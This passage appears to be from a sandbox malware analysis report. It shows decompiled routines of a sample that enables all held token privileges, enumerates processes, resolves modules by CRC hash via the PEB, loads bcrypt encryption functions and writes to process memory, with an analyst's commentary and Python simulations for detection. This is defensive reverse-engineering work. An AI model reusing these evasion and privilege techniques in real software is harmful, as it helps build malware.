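E00C61A30 above opens the sample's own token with access 0xF01FF (TOKEN_ALL_ACCESS), queries information class 3 twice (once for the size, once for the data), and walks the result in 12-byte steps, checking the DWORD at +8 of each entry and passing the entry to LookupPrivilegeNameW. That is the TOKEN_PRIVILEGES / LUID_AND_ATTRIBUTES layout, so class 3 is TokenPrivileges (TokenIntegrityLevel is class 25). For every privilege whose Attributes are 0, i.e. held by the token but currently disabled, it builds a 0x10-byte TOKEN_PRIVILEGES with PrivilegeCount = 1 and Attributes = 2 (SE_PRIVILEGE_ENABLED) and calls AdjustTokenPrivileges(hToken, FALSE, &tp, 0x10, NULL, NULL), ignoring the return value. The routine cannot grant anything the account was not assigned; what it does is switch on everything the token already carries, which for an elevated administrator includes SeDebugPrivilege, SeBackupPrivilege and SeRestorePrivilege. The Python below is an added example, not code from the report or from the sample: it reproduces the buffer parsing and the selection rule on a constructed TOKEN_PRIVILEGES blob, so an analyst can see which entries such a loop touches and the exact bytes each AdjustTokenPrivileges call would receive. The LUID-to-name table is a stand-in for LookupPrivilegeNameW and the sample token contents are made up.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Windows SDK values used by the decompiled routine.
TOKEN_ALL_ACCESS = 0x000F01FF            # dwDesiredAccess passed to OpenProcessToken
TokenPrivileges = 3                      # TOKEN_INFORMATION_CLASS queried (size, then data)
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
LUID_AND_ATTRIBUTES_SIZE = 12            # 8-byte LUID + 4-byte Attributes: the 0xc stride


@dataclass(frozen=True)
class LuidAndAttributes:
    luid: int                            # LowPart | HighPart << 32
    attributes: int


def parse_token_privileges(blob: bytes) -> List[LuidAndAttributes]:
    """Parse the buffer GetTokenInformation(TokenPrivileges) fills:
    DWORD PrivilegeCount followed by PrivilegeCount LUID_AND_ATTRIBUTES."""
    (count,) = struct.unpack_from("<I", blob, 0)
    if len(blob) < 4 + count * LUID_AND_ATTRIBUTES_SIZE:
        raise ValueError("truncated TOKEN_PRIVILEGES")
    entries = []
    for i in range(count):
        low, high, attrs = struct.unpack_from("<III", blob, 4 + i * LUID_AND_ATTRIBUTES_SIZE)
        entries.append(LuidAndAttributes((high << 32) | low, attrs))
    return entries


def pack_token_privileges(entries: List[Tuple[int, int]]) -> bytes:
    """Inverse of parse_token_privileges; used to build the constructed token and
    the single-entry request the sample passes to AdjustTokenPrivileges."""
    blob = struct.pack("<I", len(entries))
    for luid, attrs in entries:
        blob += struct.pack("<III", luid & 0xFFFFFFFF, luid >> 32, attrs)
    return blob


def select_disabled(entries: List[LuidAndAttributes]) -> List[LuidAndAttributes]:
    """The sample's filter: only entries whose Attributes are exactly 0 are adjusted;
    anything already enabled or enabled-by-default is skipped."""
    return [e for e in entries if e.attributes == 0]


def enable_request(entry: LuidAndAttributes) -> bytes:
    """The 0x10-byte TOKEN_PRIVILEGES handed to AdjustTokenPrivileges:
    PrivilegeCount = 1, the entry's LUID, Attributes = SE_PRIVILEGE_ENABLED."""
    return pack_token_privileges([(entry.luid, SE_PRIVILEGE_ENABLED)])


# Constructed stand-in for LookupPrivilegeNameW, limited to a few well-known LUIDs.
PRIVILEGE_NAMES: Dict[int, str] = {
    17: "SeBackupPrivilege",
    18: "SeRestorePrivilege",
    19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege",
    23: "SeChangeNotifyPrivilege",
}


def simulate_sample_loop(blob: bytes) -> List[Tuple[str, bytes]]:
    """Walk a token the way E00C61A30 does: for each disabled privilege return its
    name and the exact request bytes AdjustTokenPrivileges would receive."""
    return [(PRIVILEGE_NAMES.get(e.luid, "LUID:%d" % e.luid), enable_request(e))
            for e in select_disabled(parse_token_privileges(blob))]


# Constructed sample token, shaped like an elevated administrator's.
SAMPLE_TOKEN = pack_token_privileges([
    (23, SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED),  # SeChangeNotify: on
    (19, 0),                                                       # SeShutdown: held, off
    (20, 0),                                                       # SeDebug: held, off
    (17, 0),                                                       # SeBackup: held, off
])

if __name__ == "__main__":
    for name, request in simulate_sample_loop(SAMPLE_TOKEN):
        print(name, request.hex())
```

Running it lists SeShutdownPrivilege, SeDebugPrivilege and SeBackupPrivilege with their 16-byte requests; SeChangeNotifyPrivilege is skipped because its Attributes are non-zero. On a real host the same walk is done with GetTokenInformation/LookupPrivilegeNameW, and the request bytes are what a hook on AdjustTokenPrivileges would see.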

    Control-flow Graph

    control_flow_graph (basic blocks: id start-end [calls]; then edges from->to)
    • 317 100147c0-100147d0
    • 318 100147e2-100147e8
    • 319 100147d2-100147e1 NtQuerySystemInformation
    • 320 100147f0-100147fd LocalAlloc
    • 321 10014822-10014828
    • 322 100147ff-1001480e NtQuerySystemInformation
    • 323 10014810-10014812 LocalFree
    • 324 10014818-10014820
    • edges: 317->318 317->319 318->320 320->321 320->322 322->323 322->324 323->324 324->320 324->321
    C-Code - Quality: 100%
    			E100147C0(union _SYSTEMINFOCLASS __ecx, void** __edx) {
    				void* _t1;
    				void* _t2;
    				long _t4;
    				void** _t7;
    				long _t10;
    				long _t12;
    
    				_t7 = __edx;
    				_t14 = __ecx;
    				_t10 = 0xc0000004;
    				_t1 =  *__edx;
    				if(_t1 == 0) {
    					_t12 = 0x1000;
    					while(1) {
    						_t2 = LocalAlloc(0x40, _t12);
    						 *_t7 = _t2;
    						if(_t2 == 0) {
    							break;
    						}
    						_t4 = NtQuerySystemInformation(_t14, _t2, _t12, 0); // executed
    						_t10 = _t4;
    						if(_t10 < 0) {
    							LocalFree( *_t7);
    						}
    						_t12 = _t12 + _t12;
    						if(_t10 == 0xc0000004) {
    							continue;
    						}
    						break;
    					}
    					return _t10;
    				} else {
    					return NtQuerySystemInformation(__ecx, _t1, 0, 0);
    				}
    			}

    Instruction address range of the decompiled lines above: 0x100147c1-0x10014828

    APIs
    • NtQuerySystemInformation.NTDLL(00000005(SystemProcessInformation),00000000,00000000,00000000), ref: 100147D8
    • LocalAlloc.KERNEL32(00000040(LPTR),00001000,-00000FFF,?,00000001,C0000225,1001477C,?,00000000,C0000225,?,1001268A,?,00000001), ref: 100147F3
    • NtQuerySystemInformation.NTDLL(00000005(SystemProcessInformation),00000000,00001000,00000000), ref: 10014804
    • LocalFree.KERNEL32(00000001,?,00000000,C0000225,?,1001268A,?,00000001), ref: 10014812
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
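E100147C0 above is the usual NtQuerySystemInformation retry loop, here with class 5 (SystemProcessInformation, the process list): LocalAlloc(LPTR, 0x1000), query, and on STATUS_INFO_LENGTH_MISMATCH (0xC0000004) free the buffer and retry with the size doubled. Two details in the decompilation are worth noting. ReturnLength, the fourth argument, is passed as NULL, so the loop never learns the required size and doubles blindly; and on any failure status other than 0xC0000004 the buffer is freed but the caller's pointer (*__edx) is left holding the freed address, so the caller must check the returned status before touching it. The Python below is an added example, not the sample's code or the report's: it runs the blind-doubling protocol and a ReturnLength-driven variant against a constructed stand-in for NtQuerySystemInformation, so the difference in the number of calls is visible.

```python
from typing import Callable, List, Tuple

STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
SystemProcessInformation = 5            # SYSTEM_INFORMATION_CLASS the sample passes
INITIAL_SIZE = 0x1000                   # the LocalAlloc size in the decompilation

# Signature of the stand-in: (info_class, buffer_size) -> (status, return_length).
QueryFn = Callable[[int, int], Tuple[int, int]]


def make_fake_query(required: int) -> Tuple[QueryFn, List[int]]:
    """Constructed stand-in for NtQuerySystemInformation: succeeds only once the
    buffer is at least `required` bytes, otherwise reports STATUS_INFO_LENGTH_MISMATCH
    together with the size it would need. Records every buffer size it was offered."""
    calls: List[int] = []

    def query(info_class: int, buffer_size: int) -> Tuple[int, int]:
        assert info_class == SystemProcessInformation
        calls.append(buffer_size)
        if buffer_size < required:
            return STATUS_INFO_LENGTH_MISMATCH, required
        return STATUS_SUCCESS, required

    return query, calls


def query_blind_doubling(query: QueryFn, start: int = INITIAL_SIZE) -> Tuple[int, int]:
    """The loop as decompiled: ReturnLength is NULL, so the needed size is never
    read; on 0xC0000004 the buffer is released and the size doubled.
    Returns (final status, size of the buffer the caller ends up with)."""
    size = start
    while True:
        status, _ignored = query(SystemProcessInformation, size)
        if status == STATUS_INFO_LENGTH_MISMATCH:
            size += size
            continue
        return status, size


def query_with_return_length(query: QueryFn, start: int = INITIAL_SIZE,
                             slack: int = 0x1000) -> Tuple[int, int]:
    """Same protocol driven by ReturnLength: jump straight to the size the kernel
    asked for, plus slack because the process list can grow between two calls."""
    size = start
    while True:
        status, needed = query(SystemProcessInformation, size)
        if status == STATUS_INFO_LENGTH_MISMATCH:
            size = max(size, needed) + slack
            continue
        return status, size


if __name__ == "__main__":
    for fn in (query_blind_doubling, query_with_return_length):
        q, calls = make_fake_query(0x3500)
        print(fn.__name__, "->", fn(q), "sizes tried:", [hex(c) for c in calls])
```

With a snapshot that needs 0x3500 bytes the blind loop makes three calls (0x1000, 0x2000, 0x4000) and the ReturnLength-driven one two (0x1000, 0x4500). In a hook or ETW trace the 0x1000/0x2000/0x4000 sequence against class 5 is the signature of this particular loop.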

    Control-flow Graph

    control_flow_graph (basic blocks: id start-end [calls]; then edges from->to)
    • 325 10013cb0-10013cd9 GetModuleHandleW call 10013be0
    • 328 10013dd5-10013dde
    • 329 10013cdf-10013d13 NtQueryInformationProcess
    • 330 10013d19-10013d28
    • 331 10013d2e
    • 332 10013d30-10013d41 call 10004943
    • 335 10013d47-10013d6b call 10001e90 call 10010340
    • 336 10013dcb-10013dcf
    • 341 10013d6d
    • 342 10013d8c-10013d97
    • 345 10013d70-10013d76
    • 343 10013dba-10013dc9 call 1000493e
    • 344 10013d99
    • 352 10013ddf-10013de9
    • 346 10013da0-10013db8
    • 348 10013d83-10013d8a
    • 349 10013d78-10013d7b
    • 351 10013d7d-10013d80
    • edges: 325->328 325->329 329->328 329->330 330->328 330->331 331->332 332->335 332->336 335->341 335->342 336->328 336->332 341->345 342->343 342->344 343->336 343->352 344->346 345->348 345->349 346->343 346->346 348->342 348->345 349->348 349->351 351->348
    C-Code - Quality: 85%
    			E10013CB0(union _PROCESSINFOCLASS __ecx, void* __eflags) {
    				void* __edi;
    				intOrPtr _t20;
    				long _t22;
    				signed short* _t29;
    				signed int _t32;
    				signed char* _t35;
    				signed int _t41;
    				signed char* _t44;
    				intOrPtr* _t45;
    				signed int _t46;
    				signed int _t47;
    				intOrPtr* _t50;
    				void* _t51;
    				void* _t52;
    
    				 *(_t51 + 0x18) = __ecx;
    				_t20 = E10013BE0(GetModuleHandleW(L"ntdll.dll"), 0xa5c44c50);
    				 *0x1001f38c = _t20;
    				if(_t20 == 0) {
    					L16:
    					return 0;
    				} else {
    					 *(_t51 + 0x18) = 0;
    					_t39 = _t51 + 0x20;
    					 *(_t51 + 0x34) = 0;
    					asm("xorps xmm0, xmm0");
    					 *(_t51 + 0x20) = 0;
    					asm("movups [esp+0x30], xmm0"); // executed
    					_t22 = NtQueryInformationProcess(0xffffffff, 0, _t51 + 0x20, 0x18, _t51 + 0x10); // executed
    					if(_t22 == 0) {
    						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x1c)) + 0xc)) + 0xc;
    						_t45 =  *_t50;
    						while(_t45 != _t50) {
    							_push( *(_t45 + 0x2e) & 0x0000ffff);
    							_t35 = E10004943(_t39);
    							_t51 = _t51 + 4;
    							if(_t35 == 0) {
    								goto L15;
    							} else {
    								E10001E90(_t45, _t35, 0,  *(_t45 + 0x2e) & 0x0000ffff);
    								E10010340(_t35,  *((intOrPtr*)(_t45 + 0x30)),  *(_t45 + 0x2c) & 0x0000ffff);
    								_t52 = _t51 + 0x18;
    								_t29 = _t35;
    								if( *_t35 != 0) {
    									do {
    										_t41 =  *_t29 & 0x0000ffff;
    										if(_t41 >= 0x41 && _t41 <= 0x5a) {
    											 *_t29 = _t41 + 0x20;
    										}
    										_t29 =  &(_t29[1]);
    									} while ( *_t29 != 0);
    								}
    								_t39 =  *(_t45 + 0x2c) & 0x0000ffff;
    								_t47 = _t46 | 0xffffffff;
    								_t44 = _t35;
    								if(_t39 != 0) {
    									do {
    										_t32 =  *_t44 & 0x000000ff;
    										_t44 =  &(_t44[1]);
    										_t47 = _t47 >> 0x00000008 ^  *(0x1001ae10 + ((_t32 ^ _t47) & 0x000000ff) * 4);
    										_t39 = _t39 - 1;
    									} while (_t39 != 0);
    								}
    								E1000493E(_t35);
    								_t46 =  !_t47;
    								_t51 = _t52 + 4;
    								if(_t46 ==  *((intOrPtr*)(_t51 + 0x14))) {
    									return  *((intOrPtr*)(_t45 + 0x18));
    								} else {
    									goto L15;
    								}
    							}
    							goto L18;
    							L15:
    							_t45 =  *_t45;
    						}
    					}
    					goto L16;
    				}
    				L18:
    			}

    Instruction address range of the decompiled lines above: 0x10013cbc-0x10013de9

    APIs
    • GetModuleHandleW.KERNEL32(ntdll.dll,?,771CF162,?,?,?,?,?,10011147,?,?,100111E0), ref: 10013CC0
    • NtQueryInformationProcess.NTDLL(000000FF,00000000(ProcessBasicInformation),?,?,?,?,?,?,00000018,?), ref: 10013D0F
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
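E10013CB0 above resolves a module base by hash rather than by name. It obtains the PEB through NtQueryInformationProcess(ProcessBasicInformation), follows PEB->Ldr (+0xc) to InLoadOrderModuleList (+0xc) and iterates the LDR_DATA_TABLE_ENTRY list in its 32-bit layout (DllBase at +0x18, BaseDllName at +0x2c with Length, MaximumLength and Buffer at +0x2c, +0x2e and +0x30). Each BaseDllName is copied into a zeroed heap buffer (E10001E90 and E10010340 behave as memset and memcpy here), the wide characters 'A'..'Z' are shifted by 0x20 in place, and a table-driven CRC (table at 0x1001ae10, initial value 0xFFFFFFFF, final bitwise NOT) is run over Length bytes, i.e. over the UTF-16LE bytes of the lowercased name. When the hash equals the argument in ECX the function returns DllBase. E10013BE0, called at the top with 0xa5c44c50 against ntdll, is the matching export resolver; its body is not on this page, so whether that constant uses the same routine over the ASCII export name is not something the report establishes. The Python below is an added example, not code from the report or from the sample: it reproduces the module-name hash so that a candidate list can be turned into a lookup table for constants found in the disassembly. That the table is the standard CRC-32 (reflected polynomial 0xEDB88320) is an assumption, since the report shows only the table's address; the self-check against zlib proves only that this implementation is a correct CRC-32, not that the sample's table is.

```python
import zlib
from typing import Dict, Iterable, Optional

CRC32_POLY_REFLECTED = 0xEDB88320   # assumed polynomial of the table at 0x1001ae10


def make_crc_table(poly: int = CRC32_POLY_REFLECTED):
    """Build the 256-entry table the sample indexes with ((byte ^ crc) & 0xff) * 4."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = make_crc_table()


def table_crc32(data: bytes, crc: int = 0xFFFFFFFF) -> int:
    """The inner loop as decompiled: crc = (crc >> 8) ^ table[(byte ^ crc) & 0xff],
    starting from 0xFFFFFFFF and finished with a bitwise NOT."""
    for b in data:
        crc = (crc >> 8) ^ CRC_TABLE[(b ^ crc) & 0xFF]
    return (~crc) & 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Self-check: true when table_crc32 agrees with zlib's CRC-32 for this input."""
    return table_crc32(data) == (zlib.crc32(data) & 0xFFFFFFFF)


def sample_lowercase(name: str) -> str:
    """Only code units 0x41..0x5a are shifted by 0x20; everything else is untouched."""
    return "".join(chr(ord(ch) + 0x20) if 0x41 <= ord(ch) <= 0x5A else ch for ch in name)


def module_name_hash(base_dll_name: str) -> int:
    """Hash of a BaseDllName as E10013CB0 computes it: lowercase, then CRC over the
    UNICODE_STRING's Length bytes, i.e. the UTF-16LE encoding without terminator."""
    return table_crc32(sample_lowercase(base_dll_name).encode("utf-16-le"))


def build_lookup(candidates: Iterable[str]) -> Dict[int, str]:
    """Precompute hashes of likely module names so constants from the disassembly
    can be resolved offline."""
    return {module_name_hash(n): n for n in candidates}


def resolve_module_hash(h: int, lookup: Dict[int, str]) -> Optional[str]:
    return lookup.get(h & 0xFFFFFFFF)


# Candidate list for the lookup; extend it with whatever the sample is seen loading.
COMMON_MODULES = ["ntdll.dll", "kernel32.dll", "kernelbase.dll", "advapi32.dll",
                  "user32.dll", "bcrypt.dll", "shell32.dll"]

if __name__ == "__main__":
    for h, name in sorted(build_lookup(COMMON_MODULES).items()):
        print("0x%08x  %s" % (h, name))
```

If none of the candidates matches a constant, the next things to vary are the ones the page does not pin down: the table contents (dump 0x1001ae10 from the memory image and compare it with make_crc_table()) and, for export names, whether the ASCII bytes rather than UTF-16 are hashed.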
    C-Code - Quality: 59%
    			E100145E0(intOrPtr* __ecx, intOrPtr __edx) {
    				void _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v36;
    				union _PROCESSINFOCLASS _v40;
    				long _v44;
    				char _v48;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _t15;
    				long _t21;
    				char _t22;
    				void* _t26;
    				intOrPtr _t30;
    				intOrPtr* _t31;
    
    				_t31 = __ecx;
    				_t30 = __edx;
    				if( *__ecx != 1) {
    					_t26 = GetCurrentProcess();
    				} else {
    					_t1 = _t31 + 4; // 0xccde0
    					_t26 =  *( *_t1);
    				}
    				_v32 = _t30;
    				_v28 = 0x1001f2d0;
    				_v40 = 0;
    				_v36 = _t31;
    				_t15 =  *_t31;
    				if(_t15 == 0) {
    					__imp__RtlGetCurrentPeb();
    					asm("movups xmm0, [eax]");
    					asm("movups [edi], xmm0");
    					return 1;
    				} else {
    					if(_t15 != 1) {
    						L9:
    						return 0;
    					} else {
    						_t21 = NtQueryInformationProcess(_t26, 0,  &_v24, 0x18,  &_v44); // executed
    						if(_t21 < 0 || _v60 != 0x18) {
    							goto L9;
    						} else {
    							_t22 = _v36;
    							if(_t22 == 0) {
    								goto L9;
    							} else {
    								_v56 = _t22;
    								return E10014010( &_v48,  &_v56, 0x10);
    							}
    						}
    					}
    				}
    			}

    Instruction address range of the decompiled lines above: 0x100145e4-0x10014683

    APIs
    • GetCurrentProcess.KERNEL32(00000001,00001DB1), ref: 100145F5
    • NtQueryInformationProcess.NTDLL(00000000,00000000(ProcessBasicInformation),?,00000018,?), ref: 10014630
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • RtlGetCurrentPeb.NTDLL ref: 1001466D
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C51BE9() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E00C51BF5); // executed
    				return _t1;
    			}

    Instruction address range of the decompiled lines above: 0x00c51bee-0x00c51bf4

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00001BF5), ref: 00C51BEE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph

    C-Code - Quality: 95%
    			E10011BF1(intOrPtr* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
    				_Unknown_base(*)()* _t4;
    				intOrPtr _t5;
    				struct HINSTANCE__* _t7;
    				intOrPtr _t15;
    
    				 *__edi =  *__edi + __ecx;
    				 *__eax =  *__eax + __eax;
    				_t1 = __ecx + 0x1f2383d;
    				 *_t1 =  *((intOrPtr*)(__ecx + 0x1f2383d)) + __eax;
    				asm("adc [eax], al");
    				if( *_t1 != 0) {
    					_t4 =  *0x1001f234; // 0x74ee2391
    					goto L5;
    				} else {
    					_t7 = LoadLibraryW(L"bcrypt"); // executed
    					 *0x1001f238 = _t7;
    					if(_t7 == 0) {
    						L14:
    						_t5 =  *0x1001daa0; // 0x0
    						return _t5;
    					} else {
    						 *0x1001f23c = GetProcAddress(_t7, "BCryptOpenAlgorithmProvider");
    						 *0x1001f22c = GetProcAddress( *0x1001f238, "BCryptSetProperty");
    						 *0x1001f24c = GetProcAddress( *0x1001f238, "BCryptGetProperty");
    						 *0x1001f248 = GetProcAddress( *0x1001f238, "BCryptGenerateSymmetricKey");
    						 *0x1001f240 = GetProcAddress( *0x1001f238, "BCryptEncrypt");
    						 *0x1001f244 = GetProcAddress( *0x1001f238, "BCryptDecrypt");
    						 *0x1001f230 = GetProcAddress( *0x1001f238, "BCryptDestroyKey");
    						_t4 = GetProcAddress( *0x1001f238, "BCryptCloseAlgorithmProvider");
    						 *0x1001f234 = _t4;
    						if( *0x1001f238 != 0) {
    							L5:
    							if( *0x1001f23c != 0 &&  *0x1001f22c != 0 &&  *0x1001f24c != 0 &&  *0x1001f248 != 0 &&  *0x1001f240 != 0 &&  *0x1001f244 != 0 &&  *0x1001f230 != 0 && _t4 != 0) {
    								 *0x1001daa0 = E10011AD0();
    							}
    							goto L14;
    						} else {
    							_t15 =  *0x1001daa0; // 0x0
    							return _t15;
    						}
    					}
    				}
    			}

    Instruction address range of the decompiled lines above: 0x10011bf6-0x10011d1b

    APIs
    • LoadLibraryW.KERNEL32(bcrypt), ref: 10011C0F
    • GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProvider), ref: 10011C2F
    • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 10011C41
    • GetProcAddress.KERNEL32(BCryptGetProperty), ref: 10011C53
    • GetProcAddress.KERNEL32(BCryptGenerateSymmetricKey), ref: 10011C65
    • GetProcAddress.KERNEL32(BCryptEncrypt), ref: 10011C77
    • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 10011C89
    • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 10011C9B
    • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 10011CAD
      • Part of subcall function 10011AD0: LocalAlloc.KERNEL32(00000040), ref: 10011B3E
      • Part of subcall function 10011AD0: LocalAlloc.KERNEL32(00000040), ref: 10011BAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph

    APIs
    • LocalAlloc.KERNEL32(00000040), ref: 10011B3E
    • LocalAlloc.KERNEL32(00000040), ref: 10011BAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph

    C-Code - Quality: 69%
    			E1000AF1F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				signed int _t49;
    				signed int _t54;
    				int _t58;
    				signed int _t60;
    				short* _t62;
    				signed int _t66;
    				short* _t70;
    				int _t71;
    				int _t78;
    				short* _t81;
    				signed int _t87;
    				signed int _t90;
    				void* _t95;
    				void* _t96;
    				int _t98;
    				short* _t101;
    				int _t103;
    				signed int _t106;
    				short* _t107;
    				void* _t110;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t49 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t49 ^ _t106;
    				_push(__esi);
    				_t103 = _a20;
    				if(_t103 > 0) {
    					_t78 = E1000E213(_a16, _t103);
    					_t110 = _t78 - _t103;
    					_t4 = _t78 + 1; // 0x1
    					_t103 = _t4;
    					if(_t110 >= 0) {
    						_t103 = _t78;
    					}
    				}
    				_t98 = _a32;
    				if(_t98 == 0) {
    					_t98 =  *( *_a4 + 8);
    					_a32 = _t98;
    				}
    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
    				_v12 = _t54;
    				if(_t54 == 0) {
    					L38:
    					return E10001B26(_v8 ^ _t106);
    				} else {
    					_t95 = _t54 + _t54;
    					_t85 = _t95 + 8;
    					asm("sbb eax, eax");
    					if((_t95 + 0x00000008 & _t54) == 0) {
    						_t81 = 0;
    						__eflags = 0;
    						L14:
    						if(_t81 == 0) {
    							L36:
    							_t105 = 0;
    							L37:
    							E1000B187(_t81);
    							goto L38;
    						}
    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
    						_t121 = _t58;
    						if(_t58 == 0) {
    							goto L36;
    						}
    						_t100 = _v12;
    						_t60 = E10006B9A(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
    						_t105 = _t60;
    						if(_t105 == 0) {
    							goto L36;
    						}
    						if((_a12 & 0x00000400) == 0) {
    							_t96 = _t105 + _t105;
    							_t87 = _t96 + 8;
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							__eflags = _t87 & _t60;
    							if((_t87 & _t60) == 0) {
    								_t101 = 0;
    								__eflags = 0;
    								L30:
    								__eflags = _t101;
    								if(__eflags == 0) {
    									L35:
    									E1000B187(_t101);
    									goto L36;
    								}
    								_t62 = E10006B9A(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
    								__eflags = _t62;
    								if(_t62 == 0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0);
    								__eflags = _a28;
    								if(_a28 != 0) {
    									_push(_a28);
    									_push(_a24);
    								} else {
    									_push(0);
    									_push(0);
    								}
    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									E1000B187(_t101);
    									goto L37;
    								} else {
    									goto L35;
    								}
    							}
    							_t90 = _t96 + 8;
    							__eflags = _t96 - _t90;
    							asm("sbb eax, eax");
    							_t66 = _t60 & _t90;
    							_t87 = _t96 + 8;
    							__eflags = _t66 - 0x400;
    							if(_t66 > 0x400) {
    								__eflags = _t96 - _t87;
    								asm("sbb eax, eax");
    								_t101 = E10005DA1(_t87, _t66 & _t87);
    								_pop(_t87);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L35;
    								}
    								 *_t101 = 0xdddd;
    								L28:
    								_t101 =  &(_t101[4]);
    								goto L30;
    							}
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							E10010250();
    							_t101 = _t107;
    							__eflags = _t101;
    							if(_t101 == 0) {
    								goto L35;
    							}
    							 *_t101 = 0xcccc;
    							goto L28;
    						}
    						_t70 = _a28;
    						if(_t70 == 0) {
    							goto L37;
    						}
    						_t125 = _t105 - _t70;
    						if(_t105 > _t70) {
    							goto L36;
    						}
    						_t71 = E10006B9A(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
    						_t105 = _t71;
    						if(_t71 != 0) {
    							goto L37;
    						}
    						goto L36;
    					}
